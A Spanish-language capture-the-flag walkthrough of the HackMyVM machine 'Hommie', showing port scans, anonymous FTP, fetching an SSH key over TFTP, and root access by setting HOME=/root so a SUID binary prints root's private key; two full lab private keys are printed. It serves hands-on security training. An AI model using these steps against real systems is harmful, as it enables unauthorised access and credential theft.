Hommie
Hoy nos enfrentaremos a otra máquina de sml, creador de la plataforma HackMyVM, en la cual veremos una forma de reconocimiento nueva para explotar un servicio expuesto.
Reconocimiento de Puertos
Como siempre, empezaremos averiguando la IP de la máquina víctima y realizando el reconocimiento de puertos con un pequeño script que creé para automatizar este proceso inicial:
❯ sudo ./nmapauto
[*] La IP de la máquina víctima es 192.168.1.134
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 01:24 CET
Initiating ARP Ping Scan at 01:24
Scanning 192.168.1.134 [1 port]
Completed ARP Ping Scan at 01:24, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 01:24
Scanning 192.168.1.134 [65535 ports]
Discovered open port 80/tcp on 192.168.1.134
Discovered open port 22/tcp on 192.168.1.134
Discovered open port 21/tcp on 192.168.1.134
Completed SYN Stealth Scan at 01:24, 2.29s elapsed (65535 total ports)
Nmap scan report for 192.168.1.134
Host is up (0.00038s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:B3:E7:29 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.54 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[*] Escaneo avanzado de servicios
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 01:24 CET
Nmap scan report for 192.168.1.134
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.136
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c627ab53abb9c020373652a960d353fc (RSA)
| 256 483b281f9a23da71f6050ba5a6c8b7b0 (ECDSA)
|_ 256 b32e7cff622d53dd6397d44772c84e30 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:B3:E7:29 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.84 seconds
[*] Escaneo completado, se ha generado el fichero InfoPuertos
Tenemos acceso sin contraseña por FTP, interesante. Vamos de momento a ver qué nos muestra el puerto 80:
> curl $ip
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobody
Parece una pista de una clave privada expuesta, vamos a fuzzear.
Fuzzing
❯ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x php,txt,html -u $ip
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.134
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2023/02/02 01:56:08 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 99]
===============================================================
2023/02/02 01:58:37 Finished
===============================================================
No encontramos nada, solo el index que ya vimos su contenido. Vamos a ver qué nos encontramos por FTP.
FTP
❯ ftp -p $ip
Connected to 192.168.1.134.
220 (vsFTPd 3.0.3)
Name (192.168.1.134:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||52390|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
drwxrwxr-x 2 0 113 4096 Feb 01 09:06 .web
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
Bien, dentro del directorio oculto “web” tenemos el index que podemos ver a través de HTTP. Dentro de ese directorio tenemos permisos de escritura, por lo que probé a subir una reverse shell de PHP pero el servidor no ejecuta el PHP, así que tenemos que buscar otra alternativa.
Puertos UDP
Vamos a tratar de revisar los principales 250 puertos UDP que es donde se encuentran la mayoría de servicios.
❯ sudo nmap -sU --top-ports 250 $ip
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 02:22 CET
Nmap scan report for 192.168.1.134
Host is up (0.00023s latency).
Not shown: 248 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 08:00:27:B3:E7:29 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 270.02 seconds
Hemos localizado el puerto 69, vamos a ver si ahí podemos descargar la clave privada.
TFTP
Nos conectamos y la bajamos:
❯ tftp $ip
tftp> get id_rsa
tftp> quit
SSH
Ahora nos vamos a conectar vía SSH con la usuaria alexia y la clave privada recién descargada, pero antes tenemos que darle el permiso correcto al archivo:
❯ chmod 600 id_rsa
❯ ssh -i id_rsa alexia@$ip
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Feb 1 10:40:40 2023 from 192.168.1.136
alexia@hommie:~$ ls
user.txt
alexia@hommie:~$ cat user.txt
Ya tenemos la flag de user, toca escalar privilegios.
Escalada de privilegios
Como hacemos siempre, vamos a mirar la lista de permisos que tenemos para usar privilegios de otro usuario:
alexia@hommie:~$ sudo -l
-bash: sudo: command not found
Por ahí no vamos bien, vamos a ver si tenemos algún binario SUID del que nos podamos aprovechar:
alexia@hommie:~$ find / -type f -perm -4000 -ls 2>/dev/null
140 20 -rwsr-sr-x 1 root root 16720 Sep 30 2020 /opt/showMetheKey
146900 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
268129 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
132307 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
131120 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
131117 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
134620 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
134946 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
131118 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
131121 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
134473 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
134948 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
Vemos un binario extraño, vamos a ejecutarlo y ver qué hace:
alexia@hommie:~$ /opt/showMetheKey
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEApwUR2Pvdhsu1RGG0UIWmj2yDNvs+4VLPG0WWisip6oZrjMjJ40h7
V0zdgZSRFhMxx0/E6ilh2MiMbpAuogCqC3MEodzIzHYAJyK4z/lIqUNdHJbgLDyaY26G0y
Rn1XI+RqLi5NUHBPyiWEuQUEZCMOqi5lS1kaiNHmVqx+rlEs6ZUq7Z6lzYs7da3XcFGuOT
gCnBh1Wb4m4e14yF+Syn4wQVh1u/53XGmeB/ClcdAbSKoJswjI1JqCCkxudwRMUYjq309j
QMxa7bbxaJbkb3hLmMuFU7RGEPu7spLvzRwGAzCuU3f60qJVTp65pzFf3x51j3YAMI+ZBq
kyNE1y12swAAA8i6ZpNpumaTaQAAAAdzc2gtcnNhAAABAQCnBRHY+92Gy7VEYbRQhaaPbI
M2+z7hUs8bRZaKyKnqhmuMyMnjSHtXTN2BlJEWEzHHT8TqKWHYyIxukC6iAKoLcwSh3MjM
dgAnIrjP+UipQ10cluAsPJpjbobTJGfVcj5GouLk1QcE/KJYS5BQRkIw6qLmVLWRqI0eZW
rH6uUSzplSrtnqXNizt1rddwUa45OAKcGHVZvibh7XjIX5LKfjBBWHW7/ndcaZ4H8KVx0B
tIqgmzCMjUmoIKTG53BExRiOrfT2NAzFrttvFoluRveEuYy4VTtEYQ+7uyku/NHAYDMK5T
d/rSolVOnrmnMV/fHnWPdgAwj5kGqTI0TXLXazAAAAAwEAAQAAAQBhD7sthEFbAqtXEAi/
+suu8frXSu9h9sPRL4GrKa5FUtTRviZFZWv4cf0QPwyJ7aGyGJNxGZd5aiLiZfwTvZsUiE
Ua47n1yGWSWMVaZ55ob3N/F9czHg0C18qWjcOh8YBrgGGnZn1r0n1uHovBevMghlsgy/2w
pmlMTtfdUo7JfEKbZmsz3auih2/64rmVp3r0YyGrvOpWuV7spnzPNAFUCjPTwgE2RpBVtk
WeiQtF8IedoMqitUsJU9ephyYqvjRemEugkqkALBJt91yBBO6ilulD8Xv1RBsVHUttE/Jz
bu4XlJXVeD10ooFofrsZd/9Ydz4fx49GwtjYnqsda0rBAAAAgGbx1tdwaTPYdEfuK1kBhu
3ln3QHVx3ZkZ7tNQFxxEjYjIPUQcFFoNBQpIUNOhLCphB8agrhcke5+aq5z2nMdXUJ3DO6
0boB4mWSMml6aGpW4AfcDFTybT6V8pwZcThS9FL3K2JmlZbgPlhkX5fyOmh14/i5ti7r9z
HlBkwMfJJPAAAAgQDPt0ouxdkG1kDNhGbGuHSMAsPibivXEB7/wK7XHTwtQZ7cCQTVqbbs
y6FqG0oSaSz4m2DfWSRZc30351lU4ZEoHJmlL8Ul6yvCjMOnzUzkhrIen131h/MStsQYtY
OZgwwdcG2+N7MReMpbDA9FSHLtHoMLUcxShLSX3ccIoWxqAwAAAIEAzdgK1iwvZkOOtM08
QPaLXRINjIKwVdmOk3Q7vFhFRoman0JeyUbEd0qlcXjFzo02MBlBadh+XlsDUqZSWo7gpp
ivFRbnEu2sy02CHilIJ6vXCQnuaflapCNG8MlG5CtpqfyVoYQ3N3d0PfOWLaB13fGeV/wN
0x2HyroKtB+OeZEAAAANYWxleGlhQGhvbW1pZQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
Parece que tratándose de un SUID muestra la clave privada de ese usuario, vamos a ver las cadenas legibles del binario:
alexia@hommie:~$ strings /opt/showMetheKey
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat $HOME/.ssh/id_rsa
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
showMetheKey.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment
La clave está en “cat $HOME/.ssh/id_rsa”, si modificamos la variable por el home de root obtendremos su clave privada.
alexia@hommie:~$ export HOME=/root
alexia@hommie:/home/alexia$ /opt/showMetheKey
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAvBYog1I3rTTmtMw6i7oPRYy7yj8N6zNT3K9QhalnaTF+Md5NjbX5
hhNfZjO0tNbMGEeJtNTc3FpYWcAujrrd3jO5MzHUWAxQoyYYrZOFj2I5Fz/0RxD7e89H11
5nT7+CSUeddP/UeoyvSPgaruwrwD+dUl7+GiXo3sc5vsq3YufTYh1MlMKb/m7KmVk5n4Tk
/IFJwuuc3U4OZiRwXOmK4W2Gfo0Fonu6vFYmhpcCsi7V8g3hpVmOZIU8ZUtG1YbutCVbOC
EGyc1p5nbnyC0IIF5Y2EhjeevX8gmj4Kdv/y6yuvNdsJKm+ed2EEY9AymmPPwIpQshFwKz
Y0yB8N1jkQAAA8BiCyR9YgskfQAAAAdzc2gtcnNhAAABAQC8FiiDUjetNOa0zDqLug9FjL
vKPw3rM1Pcr1CFqWdpMX4x3k2NtfmGE19mM7S01swYR4m01NzcWlhZwC6Out3eM7kzMdRY
DFCjJhitk4WPYjkXP/RHEPt7z0fXXmdPv4JJR510/9R6jK9I+Bqu7CvAP51SXv4aJejexz
m+yrdi59NiHUyUwpv+bsqZWTmfhOT8gUnC65zdTg5mJHBc6YrhbYZ+jQWie7q8ViaGlwKy
LtXyDeGlWY5khTxlS0bVhu60JVs4IQbJzWnmdufILQggXljYSGN569fyCaPgp2//LrK681
2wkqb553YQRj0DKaY8/AilCyEXArNjTIHw3WORAAAAAwEAAQAAAQA/OvPDshAlmnM0tLO5
5YLczsMS6r+zIj4/InDffmPVaV4TRbisu1B3Umvv39IQOWXDg8k3kZfuPDEXexQrx4Zu/N
R18XqBXyJ8toH1WHK+ETdAKa/ldEAXD0gHjyUMGkWifQDiJF86E7GZxk6yH5NVvg0Vc/nY
sIXo3vD6wwuDo/gj+u4RRYMH3NYkLSj/O67cxGXnTOZPGzGsFTrE218BNtNqbRBR9/immU
irjugqebxY135Z4oECe/Hv4mP2e7n5QVO8FnYklQ4YU6y0ZTAMtjZCAhslXSKvaJPLjXuk
/HpdYhSoojm3vTAq/NT/oir0wA2ZYGdnF/Bxm6v/mntBAAAAgF2pqZEe9UqzcsAfOujr6z
DMRgPpl8qsdhDz6aftdg24AYmgXJ1D7PWUDpU6puO3VxJGrOwvcgD6xELRTxeFjd/2ssrh
4OO/kTvK4K0WVB/bnZ4y724iLcThfHDbzTTc5ckn45tyso8540iKha5ay1i24GwRPWddie
B/qcB1bHNOAAAAgQDmmptuwTRwUSiU1NtZRnJFvxvzLw6Wy/Cb2G+n5KY0ce5cYHT2HSIr
zsbPaDXQNBFy4iu1DAXAJJXTrxjOaAeLVYSb/8eZ1dhcgkxoAC8i2l6NwNmsjhGQKv++fV
qMfIdzVmriLXBZf7DU97YZeDIOrdOOV5CHhq+37i4xNdK18wAAAIEA0Mzc8HYvrXk4ecyi
KXP5u2Zxw2LADJ8DFeKWZmCUuNKFD1TuqdauxKxIVKVDaHvcnEr1bOiEBBso/X1CCtKjE+
12ZOWvqZ4fORxiNs9n/9YxlUSDAw7kyKd9H7dRRFdtb80OgDiwf18tDlEdboGWm/DR0NPq
gmxzbd40GES6DWsAAAALcm9vdEBob21taWU=
-----END OPENSSH PRIVATE KEY-----
Copiamos la clave en un fichero y le damos permiso 600 igual que antes, solo falta conectarse como root con la misma:
alexia@hommie:/home/alexia$ chmod 600 id_rsa
alexia@hommie:/home/alexia$ ssh -i id_rsa root@localhost
Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Feb 1 11:09:07 2023 from ::1
root@hommie:~# ls
note.txt
root@hommie:~# cat note.txt
I dont remember where I stored root.txt !!!
root@hommie:~# find / -name root.txt
/usr/include/root.txt
root@hommie:~# cat /usr/include/root.txt
Con esto finalizamos la máquina. Me gusta que sml siempre varía las formas de resolver sus máquinas para que practiques cosas nuevas. Agradecer como siempre su trabajo para la comunidad.